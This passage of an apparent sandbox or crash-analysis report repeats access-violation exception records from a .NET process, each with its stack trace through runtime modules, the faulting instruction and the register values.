@ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844164 registers.edi: 4844456 registers.eax: 0 registers.ebp: 4844172 registers.edx: 0 registers.ebx: 4846468 registers.esi: 38175540 registers.ecx: 39562400	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de337b 0x6de2def 0x6de2d05 0x6de12d4 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844164 registers.edi: 4844456 registers.eax: 0 registers.ebp: 4844172 registers.edx: 0 registers.ebx: 4846468 registers.esi: 38175540 registers.ecx: 40867856	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 f3 0b fa 6a 89 85 4c fe ff ff 8d bd 44 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de1566 registers.esp: 4844572 registers.edi: 4845336 registers.eax: 0 registers.ebp: 4845372 registers.edx: 0 registers.ebx: 4846468 registers.esi: 4845164 registers.ecx: 0	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de82df 0x6de7da0 0x6de2ced 0x6de1a1b 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844172 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844180 registers.edx: 0 registers.ebx: 4846468 registers.esi: 38175540 registers.ecx: 38614856	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de82df 0x6de7da0 0x6de2d05 0x6de1a1b 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844172 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844180 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37570192 registers.ecx: 39966128	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de82df 0x6de7da0 0x6de2d05 0x6de1a1b 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844172 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844180 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37570192 registers.ecx: 41401332	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de8a93 0x6de8578 0x6de2ced 0x6de1b1d 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844184 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844192 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37570192 registers.ecx: 38104932	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de8a93 0x6de8578 0x6de2d05 0x6de1b1d 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844184 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844192 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 39504328	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de8a93 0x6de8578 0x6de2d05 0x6de1b1d 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844184 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844192 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 40903712	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de8f25 0x6de8bd0 0x6de2ced 0x6de1c0a 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844268 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844276 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 37905328	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de8f25 0x6de8bd0 0x6de2d05 0x6de1c0a 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844268 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844276 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 39183720	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de8f25 0x6de8bd0 0x6de2d05 0x6de1c0a 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844268 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844276 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 40585776	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de9380 0x6de9058 0x6de2ced 0x6de1cdf 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844280 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844288 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 41987864	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de9380 0x6de9058 0x6de2d05 0x6de1cdf 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844280 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844288 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 43520984	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de9380 0x6de9058 0x6de2d05 0x6de1cdf 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844280 registers.edi: 4844484 registers.eax: 0 registers.ebp: 4844288 registers.edx: 0 registers.ebx: 4846468 registers.esi: 37557844 registers.ecx: 38610632	1
